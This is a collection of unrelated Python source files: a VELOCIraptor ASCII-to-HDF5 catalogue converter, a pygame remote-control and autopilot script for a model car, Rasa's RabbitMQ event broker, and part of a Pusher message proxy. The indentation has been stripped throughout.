filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0):
cattemp = np.loadtxt(filename,skiprows=2).transpose()
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(cattemp[ikeys*numhalos:(ikeys+1)*numhalos],dtype=fieldtype[ikeys]))
else:
cattemp=[]
for ikeys in range(len(fieldnames)):
hdffile.create_dataset(fieldnames[ikeys],data=np.array([],dtype=fieldtype[ikeys]))
hdffile.close()
def ConvertASCIICatalogParticleFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_particles"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_particles"
hdffilename=basefilename+".hdf.catalog_particles"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_particles"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"
else:
filename=basefilename+".sublevels"+".catalog_particles"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_particles"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_IDs",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIICatalogParticleTypeFileToHDF(basefilename,iunbound=0,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".catalog_parttypes"
if (iunbound>0): filename+=".unbound"
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
else:
filename=basefilename+".catalog_parttypes"
hdffilename=basefilename+".hdf.catalog_parttypes"
if (iunbound>0):
filename+=".unbound"
hdffilename+=".unbound"
filename+="."+str(ifile)
hdffilename+="."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".catalog_parttypes"
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"
else:
filename=basefilename+".sublevels"+".catalog_parttypes"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".catalog_parttypes"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_particles_in_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_particles_in_all_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): cattemp = np.loadtxt(filename,skiprows=2).transpose()
else: cattemp=[]
hdffile.create_dataset("Particle_Types",data=np.array(cattemp,dtype=np.int64))
hdffile.close()
def ConvertASCIIToHDF(basefilename,iseparatesubfiles=0,itype=0,iverbose=0):
ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogGroupsFileToHDF(basefilename,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
if (itype==1):
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,0,iseparatesubfiles,iverbose)
ConvertASCIICatalogParticleTypeFileToHDF(basefilename,1,iseparatesubfiles,iverbose)
|
drive5.py
|
from __future__ import print_function
import pygame
import os, sys, time, shutil
from datetime import datetime
import select
import argparse
import urllib2
import subprocess
#import cv2
import numpy as np, pandas as pd
from PIL import ImageOps
from PIL import Image
from train4 import process_image, model
import logging
import threading
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
NUM_CLASSES = 4
# delta_time = -200
delta_time = 1000
#Original Image size
oshapeX = 640
oshapeY = 480
#Orignal Multi size
moshapeX = 640 * 2
moshapeY = 480
#Scaled Image size
shapeX = 160
shapeY = 120
#Scaled Multi size
mshapeX = 320
mshapeY = 120
conf_level=0.3
# num_reqs = 10
# v_width = 16.
# v_length = 24.
# err_marrgin = 5
actions = [pygame.K_UP,pygame.K_LEFT,pygame.K_RIGHT,pygame.K_DOWN]
def init_sound():
sounds = {}
sounds['start'] = pygame.mixer.Sound('assets/sound/start_car.wav')
sounds['vroom'] = pygame.mixer.Sound('assets/sound/vroom_car.wav')
sounds['drive'] = pygame.mixer.Sound('assets/sound/drive_car.wav')
sounds['slow'] = pygame.mixer.Sound('assets/sound/slow_car.wav')
sounds['idle'] = pygame.mixer.Sound('assets/sound/idle_car.wav')
return sounds
def verify_args():
var = {}
# verify command line arguments
if os.path.exists(args.st_dir):
fetch_last_img = "ls " + args.st_dir + " | tail -n1"
var['fetch_last_img'] = fetch_last_img
else:
logging.error("Error: streaming directory %s does not exist" % args.st_dir)
exit(1)
if args.wheel:
delta_time = -100
if args.multi:
dir_left = args.st_dir + "/left"
dir_right = args.st_dir + "/right"
var['dir_left'] = dir_left
var['dir_right'] = dir_right
if os.path.exists(dir_left) and os.path.exists(dir_right):
fetch_last_left = "ls " + dir_left + " | tail -n1"
fetch_last_right = "ls " + dir_right + " | tail -n1"
var['fetch_last_left'] = fetch_last_left
var['fetch_last_right'] = fetch_last_right
else:
logging.error("Error: streaming directory %s is not compatible\
for mulit-cam" % args.st_dir)
exit(1)
shape = (mshapeY, mshapeX, 3)
else:
shape = (shapeY, shapeX, 3)
auto = 0
if args.model:
ml_model = model(True, shape, tr_model=args.model)
auto = args.auto
else:
ml_model = None
auto = False
train = False
if args.train:
train = True
data_dir = "./model_data/"
var['data_dir'] = data_dir
if not args.multi:
img_dir = "./data_sets/" + args.train + "/data/"
var['img_dir'] = img_dir
else:
img_dir_left = "./data_sets/" + args.train + "/left/"
img_dir_right = "./data_sets/" + args.train + "/right/"
if not os.path.exists(img_dir_left):
os.makedirs(img_dir_left)
if not os.path.exists(img_dir_right):
os.makedirs(img_dir_right)
var['img_dir_left'] = img_dir_left
var['img_dir_right'] = img_dir_right
return var, ml_model, auto, train
def display_img():
ret_img = []
if not args.multi:
test = subprocess.check_output(var['fetch_last_img'], shell=True)
ret_img = [test]
img_name = args.st_dir + "/" + test.decode("utf-8").strip()
img = pygame.image.load(img_name)
if img:
img = pygame.transform.scale(img,(oshapeX,oshapeY))
screen.blit(img,(0,0))
pygame.display.flip()
return ret_img
else:
try:
img_left = subprocess.check_output(var['fetch_last_left'], shell=True)
img_right = subprocess.check_output(var['fetch_last_right'], shell=True)
img_left = var['dir_left'] + "/" + img_left.decode("utf-8").strip()
img_right = var['dir_right'] + "/" + img_right.decode("utf-8").strip()
ret_img = [img_left, img_right]
img_left = pygame.image.load(img_left)
img_right = pygame.image.load(img_right)
if img_left and img_right:
img_left = pygame.transform.scale(img_left,(oshapeX,oshapeY))
img_right = pygame.transform.scale(img_right,(oshapeX,oshapeY))
screen.blit(img_left,(0,0))
screen.blit(img_right,(oshapeX,0))
pygame.display.flip()
return ret_img
except:
pass
logging.error("error: couldn't get an image")
return None
def record_data(act_i, img):
logging.debug("Entering record_data %d %s" % (act_i, str(img)))
if act_i < 6:
ts = time.time()
st = datetime.fromtimestamp(ts).strftime('%Y%m%d-%H%M%S-%f')[:-4]
logging.debug(img)
new_names = [st + "_" + img_name.split("/")[-1] for img_name in img]
logging.debug(new_names)
sa_append = new_names + [act_i]
sa_lst.append(sa_append)
if args.multi:
# do left
shutil.copy(img[0], var['img_dir_left']+new_names[0])
# do right
shutil.copy(img[1], var['img_dir_right']+new_names[1])
else:
shutil.copy(img[0], var['img_dir']+new_names[0])
logging.debug("Exiting record_data %d %s" % (act_i, str(img)))
def engine(switch):
print(engine.drive)
startup = 0
if engine.drive == -1:
startup = 1
if switch != engine.drive:
engine.drive = switch
if engine.drive:
channel.play(sounds['vroom'], 0, 1000)
else:
if not startup:
channel.play(sounds['slow'], 0, 1000)
if engine.drive:
channel.queue(sounds['drive'])
else:
channel.queue(sounds['idle'])
def send_control(act_i, img):
global train, threads
try:
logging.info("Sending command %s" % links[act_i])
if not args.teach:
r = urllib2.urlopen(clinks[act_i], timeout=2)
if train and act_i < 6:
t = threading.Thread(target=record_data, args=(act_i,img))
t.setDaemon(True)
# threads.append(t)
t.start()
return 0
except:
logging.error("send_control: Command %s couldn't reach a vehicle" % clinks[act_i])
return -1
def manual_drive_ext(img,intent):
for act_i in range(len(actions)):
tmp = actions[act_i]
if tmp==intent:
logging.debug("acting out %d" % tmp)
res = send_control(act_i, img)
return
def manual_drive(img, keys, wheel):
try:
r = urllib2.urlopen(args.url+wheel, timeout=2)
if links[0] in wheel or links[3] in wheel:
engine(1)
except:
logging.error("Error: wheel command failed.")
# for act_i in range(len(links)):
# if links[act_i] == wheel:
# res = send_control(act_i, img)
# return
def reverse_motion():
last_command = sa_lst[-1][-1]
logging.info("Sending command %s" % last_command)
send_control(inv_command, img_name)
def emergency_reverse():
logging.info("Sending command %s" % links[3])
try:
r = urllib2.urlopen(clinks[3], timeout=2)
except:
logging.error("emergency_reverse: Command %s couldn't reach a vehicle" % clinks[3])
def auto_drive(img):
if img:
md_img, _ = process_image(img, None, False, args.multi, shape=(shapeY,shapeX))
pred_act = model.predict(np.array([md_img]))[0]
logging.info("Lft: %.2f | Fwd: %.2f | Rht: %.2f | Rev: %.2f" %
(pred_act[1], pred_act[0], pred_act[2], pred_act[3]))
act_i = np.argmax(pred_act)
if (pred_act[act_i]<conf_level): emergency_reverse()
else: send_control(act_i, img)
return pred_act, act_i
else:
logging.error("Error: no image for prediction")
return None, None
def drive(auto):
intent=0
ot = 0
img = None
drive = False
logging.debug("before thread")
while True:
ct = time.time()
drive = True if (ct - ot) * 1000 > exp_time + delta_time else drive
keys = pygame.key.get_pressed()
for act_i in range(len(actions)):
tmp = actions[act_i]
if keys[tmp]:
logging.debug("Key pressed %d" % tmp)
intent=tmp
if args.wheel:
wheel = subprocess.check_output("humancontrol/wheeltest")
else:
wheel = ''
if keys[pygame.K_ESCAPE] or keys[pygame.K_q] or \
pygame.event.peek(pygame.QUIT):
logging.debug("Exit pressed")
return
if drive and not auto:
logging.debug("Drive")
drive = False
if not wheel:
if args.wheel:
engine(0)
manual_drive_ext(img,intent)
intent=0
else:
manual_drive(img,keys, wheel)
ot = ct
if keys[pygame.K_a]:
auto = True
logging.info("Autopilot mode on!")
if keys[pygame.K_s]:
auto = False
logging.info("Autopilot mode off!")
keys=[]
pygame.event.pump()
img = display_img()
logging.debug("Calling display_img()")
logging.debug(img)
# If drive windows is open and currently autopilot mode is on
if auto and drive and img:
logging.debug("Calling model prediction")
drive = False
pred_act, act_i = auto_drive(img)
ot = ct
def build_parser():
parser = argparse.ArgumentParser(description='Driver')
parser.add_argument(
'-model',
type=str,
default='',
help='Path to model h5 file. Model should be on the same path.'
)
parser.add_argument(
'-auto',
action='store_true',
default=False,
help='Autopilot mode on/off. Default: off'
)
parser.add_argument(
'-multi',
action='store_true',
default=False,
help='Set multi cam on/off. Default: off'
)
parser.add_argument(
'-url',
type=str,
help='Url for connection. Default: http://192.168.2.3',
default="http://192.168.2.3"
)
parser.add_argument(
'-st_dir',
type=str,
help='Img stream directory. Default: st_dir',
default="st_dir"
)
parser.add_argument(
'-exp_time',
type=int,
help='Command expiration time. Default: 500ms',
default=250
)
parser.add_argument(
'-speed',
type=int,
help='Command motor power. Default: 250',
default=250
)
parser.add_argument(
'-train',
type=str,
help='Name of the training set. Default: none',
default=""
)
parser.add_argument(
'-teach',
action='store_true',
default=False,
help='Set teach mode on/off if train flag is enabled. Default: off'
)
parser.add_argument(
'-wheel',
action='store_true',
default=False,
help="Set wheel controls on/off. Default: off"
)
return parser
if __name__ == "__main__":
parser = build_parser()
args = parser.parse_args()
var, model, auto, train = verify_args()
links = ['/fwd', '/fwd/lf', '/fwd/rt', '/rev', '/rev/lf', '/rev/rt', '']
clinks = [args.url + el +'/exp' + str(args.exp_time) + '/m'+str(args.speed) for el in links]
sa_lst = []
threads = []
#Car Startup sound
if args.wheel:
pygame.mixer.init()
sounds = init_sound()
channel = pygame.mixer.Channel(0)
channel.play(sounds['start'], 0, 4500)
#pygame.time.wait(4500)
engine.drive = -1
engine(0)
pygame.init()
#check car response
exp_time = args.exp_time
if send_control(6, None):
logging.info("Exiting")
pygame.quit()
exit(0)
if not args.multi:
size = (oshapeX,oshapeY)
else:
size = (moshapeX, moshapeY)
screen = pygame.display.set_mode(size)
logging.info("Fully initialized. Ready to drive")
drive(auto)
logging.info("Done driving")
# for t in threads:
# t.join()
if train:
if args.multi:
column = ["img_left", "img_right", "command"]
else:
column = ["img_name", "command"]
df = pd.DataFrame(sa_lst, columns=column)
df.to_csv(var['data_dir'] + args.train + "_log.csv", index=False)
pygame.quit()
|
pika.py
|
import json
import logging
import typing
import os
import warnings
from collections import deque
from threading import Thread
from typing import Dict, Optional, Text, Union, Deque, Callable
import time
from rasa.constants import ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
from rasa.core.brokers.broker import EventBroker
from rasa.utils.endpoints import EndpointConfig
from rasa.utils.io import DEFAULT_ENCODING
if typing.TYPE_CHECKING:
from pika.adapters.blocking_connection import BlockingChannel
from pika import SelectConnection, BlockingConnection, BasicProperties
from pika.channel import Channel
import pika
from pika.connection import Parameters, Connection
logger = logging.getLogger(__name__)
def initialise_pika_connection(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "BlockingConnection":
"""Create a Pika `BlockingConnection`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
Pika `BlockingConnection` with provided parameters
"""
import pika
parameters = _get_pika_parameters(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return pika.BlockingConnection(parameters)
def _get_pika_parameters(
host: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "Parameters":
"""Create Pika `Parameters`.
Args:
host: Pika host
username: username for authentication with Pika host
password: password for authentication with Pika host
port: port of the Pika host
connection_attempts: number of channel attempts before giving up
retry_delay_in_seconds: delay in seconds between channel attempts
Returns:
Pika `Paramaters` which can be used to create a new connection to a broker.
"""
import pika
if host.startswith("amqp"):
# user supplied a amqp url containing all the info
parameters = pika.URLParameters(host)
parameters.connection_attempts = connection_attempts
parameters.retry_delay = retry_delay_in_seconds
if username:
parameters.credentials = pika.PlainCredentials(username, password)
else:
# host seems to be just the host, so we use our parameters
parameters = pika.ConnectionParameters(
host,
port=port,
credentials=pika.PlainCredentials(username, password),
connection_attempts=connection_attempts,
# Wait between retries since
# it can take some time until
# RabbitMQ comes up.
retry_delay=retry_delay_in_seconds,
ssl_options=create_rabbitmq_ssl_options(host),
)
return parameters
def initialise_pika_select_connection(
parameters: "Parameters",
on_open_callback: Callable[["SelectConnection"], None],
on_open_error_callback: Callable[["SelectConnection", Text], None],
) -> "SelectConnection":
"""Create a non-blocking Pika `SelectConnection`.
Args:
parameters: Parameters which should be used to connect.
on_open_callback: Callback which is called when the connection was established.
on_open_error_callback: Callback which is called when connecting to the broker
failed.
Returns:
An callback based connection to the RabbitMQ event broker.
"""
import pika
return pika.SelectConnection(
parameters,
on_open_callback=on_open_callback,
on_open_error_callback=on_open_error_callback,
)
def initialise_pika_channel(
host: Text,
queue: Text,
username: Text,
password: Text,
port: Union[Text, int] = 5672,
connection_attempts: int = 20,
retry_delay_in_seconds: Union[int, float] = 5,
) -> "BlockingChannel":
"""Initialise a Pika channel with a durable queue.
Args:
host: Pika host.
queue: Pika queue to declare.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
connection_attempts: Number of channel attempts before giving up.
retry_delay_in_seconds: Delay in seconds between channel attempts.
Returns:
Pika `BlockingChannel` with declared queue.
"""
connection = initialise_pika_connection(
host, username, password, port, connection_attempts, retry_delay_in_seconds
)
return _declare_pika_channel_with_queue(connection, queue)
def _declare_pika_channel_with_queue(
connection: "BlockingConnection", queue: Text
) -> "BlockingChannel":
"""Declare a durable queue on Pika channel."""
channel = connection.channel()
channel.queue_declare(queue, durable=True)
return channel
def close_pika_channel(channel: "Channel") -> None:
"""Attempt to close Pika channel."""
from pika.exceptions import AMQPError
try:
channel.close()
logger.debug("Successfully closed Pika channel.")
except AMQPError:
logger.exception("Failed to close Pika channel.")
def close_pika_connection(connection: "Connection") -> None:
"""Attempt to close Pika connection."""
from pika.exceptions import AMQPError
try:
connection.close()
logger.debug("Successfully closed Pika connection with host.")
except AMQPError:
logger.exception("Failed to close Pika connection with host.")
class PikaEventBroker(EventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queue: Text = "rasa_core_events",
loglevel: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
):
"""RabbitMQ event producer.
Args:
host: Pika host.
username: Username for authentication with Pika host.
password: Password for authentication with Pika host.
port: port of the Pika host.
queue: Pika queue to declare.
loglevel: Logging level.
"""
logging.getLogger("pika").setLevel(loglevel)
self.queue = queue
self.host = host
self.username = username
self.password = password
self.port = port
self.channel: Optional["Channel"] = None
# List to store unpublished messages which hopefully will be published later
self._unpublished_messages: Deque[Text] = deque()
self._run_pika()
def __del__(self) -> None:
if self.channel:
close_pika_channel(self.channel)
close_pika_connection(self.channel.connection)
@property
def rasa_environment(self) -> Optional[Text]:
return os.environ.get("RASA_ENVIRONMENT")
@classmethod
def from_endpoint_config(
cls, broker_config: Optional["EndpointConfig"]
) -> Optional["PikaEventBroker"]:
if broker_config is None:
return None
return cls(broker_config.url, **broker_config.kwargs)
def _run_pika(self) -> None:
parameters = _get_pika_parameters(
self.host, self.username, self.password, self.port
)
self._pika_connection = initialise_pika_select_connection(
parameters, self._on_open_connection, self._on_open_connection_error
)
# Run Pika io loop in extra thread so it's not blocking
self._run_pika_io_loop_in_thread()
def _on_open_connection(self, connection: "SelectConnection") -> None:
logger.debug(f"RabbitMQ connection to '{self.host}' was established.")
connection.channel(on_open_callback=self._on_channel_open)
def _on_open_connection_error(self, _, error: Text) -> None:
logger.warning(
f"Connecting to '{self.host}' failed with error '{error}'. Trying again."
)
def _on_channel_open(self, channel: "Channel") -> None:
logger.debug("RabbitMQ channel was opened.")
channel.queue_declare(self.queue, durable=True)
self.channel = channel
while self._unpublished_messages:
# Send unpublished messages
message = self._unpublished_messages.popleft()
self._publish(message)
logger.debug(
f"Published message from queue of unpublished messages. "
f"Remaining unpublished messages: {len(self._unpublished_messages)}."
)
def _run_pika_io_loop_in_thread(self) -> None:
thread = Thread(target=self._run_pika_io_loop, daemon=True)
thread.start()
def _run_pika_io_loop(self) -> None:
self._pika_connection.ioloop.start()
def publish(
self, event: Dict, retries: int = 60, retry_delay_in_seconds: int = 5
) -> None:
"""Publish `event` into Pika queue.
Perform `retries` publish attempts with `retry_delay_in_seconds` between them.
"""
body = json.dumps(event)
while retries:
try:
self._publish(body)
return
except Exception as e:
logger.error(
"Could not open Pika channel at host '{}'. Failed with error: "
"{}".format(self.host, e)
)
self.channel = None
retries -= 1
time.sleep(retry_delay_in_seconds)
logger.error(
"Failed to publish Pika event to queue '{}' on host "
"'{}':\n{}".format(self.queue, self.host, body)
)
@property
def _message_properties(self) -> "BasicProperties":
"""Create RabbitMQ message properties.
Returns:
pika.spec.BasicProperties with the `RASA_ENVIRONMENT` environment
variable as the properties' `app_id` value. If this variable is unset, empty
pika.spec.BasicProperties.
"""
from pika.spec import BasicProperties
kwargs = {"app_id": self.rasa_environment} if self.rasa_environment else {}
return BasicProperties(**kwargs)
def _publish(self, body: Text) -> None:
if self._pika_connection.is_closed:
# Try to reset connection
self._run_pika()
elif not self.channel:
logger.warning(
f"RabbitMQ channel has not been assigned. Adding message to "
f"list of unpublished messages and trying to publish them "
f"later. Current number of unpublished messages is "
f"{len(self._unpublished_messages)}."
)
self._unpublished_messages.append(body)
else:
self.channel.basic_publish(
"",
self.queue,
body.encode(DEFAULT_ENCODING),
properties=self._message_properties,
)
logger.debug(
f"Published Pika events to queue '{self.queue}' on host "
f"'{self.host}':\n{body}"
)
def create_rabbitmq_ssl_options(
rabbitmq_host: Optional[Text] = None,
) -> Optional["pika.SSLOptions"]:
"""Create RabbitMQ SSL options.
Requires the following environment variables to be set:
RABBITMQ_SSL_CLIENT_CERTIFICATE - path to the SSL client certificate (required)
RABBITMQ_SSL_CLIENT_KEY - path to the SSL client key (required)
RABBITMQ_SSL_CA_FILE - path to the SSL CA file for verification (optional)
RABBITMQ_SSL_KEY_PASSWORD - SSL private key password (optional)
Details on how to enable RabbitMQ TLS support can be found here:
https://www.rabbitmq.com/ssl.html#enabling-tls
Args:
rabbitmq_host: RabbitMQ hostname
Returns:
Pika SSL context of type `pika.SSLOptions` if
the RABBITMQ_SSL_CLIENT_CERTIFICATE and RABBITMQ_SSL_CLIENT_KEY
environment variables are valid paths, else `None`.
"""
client_certificate_path = os.environ.get("RABBITMQ_SSL_CLIENT_CERTIFICATE")
client_key_path = os.environ.get("RABBITMQ_SSL_CLIENT_KEY")
if client_certificate_path and client_key_path:
import pika
import rasa.server
logger.debug(f"Configuring SSL context for RabbitMQ host '{rabbitmq_host}'.")
ca_file_path = os.environ.get("RABBITMQ_SSL_CA_FILE")
key_password = os.environ.get("RABBITMQ_SSL_KEY_PASSWORD")
ssl_context = rasa.server.create_ssl_context(
client_certificate_path, client_key_path, ca_file_path, key_password
)
return pika.SSLOptions(ssl_context, rabbitmq_host)
else:
return None
class PikaProducer(PikaEventBroker):
def __init__(
self,
host: Text,
username: Text,
password: Text,
port: Union[int, Text] = 5672,
queue: Text = "rasa_core_events",
loglevel: Union[Text, int] = os.environ.get(
ENV_LOG_LEVEL_LIBRARIES, DEFAULT_LOG_LEVEL_LIBRARIES
),
):
warnings.warn(
"The `PikaProducer` class is deprecated, please inherit "
"from `PikaEventBroker` instead. `PikaProducer` will be "
"removed in future Rasa versions.",
DeprecationWarning,
stacklevel=2,
)
super(PikaProducer, self).__init__(
host, username, password, port, queue, loglevel
)
|
pushrpc.py
|
"""Pusher intergration for messages from the cloud."""
import json
import logging
import Queue
import sys
import threading
import uuid
from pusherclient import Pusher
import requests
import websocket
from common import public_creds
from pi import simple_pusher
CONFIG_FILE = 'proxy.cfg'
APPENGINE_ADDRESS = 'https://%s.appspot.com' % public_creds.appengine_app_id
LOCAL_ADDRESS = 'http://localhost:8080'
EVENT_PATH = '/api/device/events'
AUTH_PATH = '/api/proxy/channel_auth'
def read_or_make_config():
"""Read proxy id and secret from file, or make new one."""
try:
with open(CONFIG_FILE) as config_file:
return config_file.read().split(',')
except:
proxy_id = str(uuid.uuid4().get_hex())
proxy_secret = str(uuid.uuid4().get_hex())
with open(CONFIG_FILE, 'w') as config_file:
config_file.write('%s,%s' % (proxy_id, proxy_secret))
return (proxy_id, proxy_secret)
class PushRPC(object):
"""Wrapper for pusher integration."""
# pylint: disable=too-many-instance-attributes
def __init__(self, callback, args):
self._proxy_id, self._proxy_secret = read_or_make_config()
logging.info('I am proxy \'%s\'', self._proxy_id)
self._args = args
self._exiting = False
self._events = Queue.Queue()
self._events_thread = threading.Thread(target=self._post_events_loop)
self._events_thread.daemon = True
self._events_thread.start()
self._callback = callback
if args.local:
self._websocket_connection = None
self._websocket_thread = threading.Thread(target=self._local_websocket)
self._websocket_thread.start()
else:
self._pusher = Pusher(public_creds.pusher_key,
auth_callback=self._pusher_auth_callback,
log_level=logging.ERROR)
self._pusher.connection.bind(
'pusher:connection_established',
self._connect_handler)
self._pusher.connect()
def _local_websocket(self):
"""Connect to local websocket server."""
self._websocket_connection = websocket.create_connection(
"ws://localhost:%d/" % simple_pusher.WEBSOCKET_PORT)
request = json.dumps({'channel': 'private-%s' % self._proxy_id})
self._websocket_connection.send(request)
while True:
result = self._websocket_connection.recv()
self._callback_handler(result)
def _pusher_auth_callback(self, socket_id, channel_name):
params = {'socket_id': socket_id, 'channel_name': channel_name}
response = self._make_request(APPENGINE_ADDRESS, AUTH_PATH, params=params)
response = response.json()
return response['auth']
def _make_request(self, server, path, method='GET', **kwargs):
"""Make a request to the server with this proxy's auth."""
response = requests.request(
method, server + path,
auth=(self._proxy_id, self._proxy_secret),
headers={'content-type': 'application/json',
'awesomation-proxy': 'true'},
**kwargs)
response.raise_for_status()
return response
def _connect_handler(self, _):
channel_name = 'private-%s' % self._proxy_id
channel = self._pusher.subscribe(channel_name)
channel.bind('events', self._callback_handler)
def _callback_handler(self, data):
"""Callback for when messages are recieved from pusher."""
try:
events = json.loads(data)
except ValueError:
logging.error('Error parsing message', exc_info=sys.exc_info())
return
# pylint: disable=broad-except
try:
self._callback(events)
except Exception:
logging.error('Error running push callback', exc_info=sys.exc_info())
def send_event(self, event):
self._events.put(event)
def _get_batch_of_events(self, max_size=20):
"""Retrieve as many events from queue as possible without blocking."""
events = []
while len(events) < max_size:
try:
# First time round we should wait (when list is empty)
block = len(events) == 0
event = self._events.get(block)
# To break out of this thread, we inject a None event in stop()
if event is None:
return None
events.append(event)
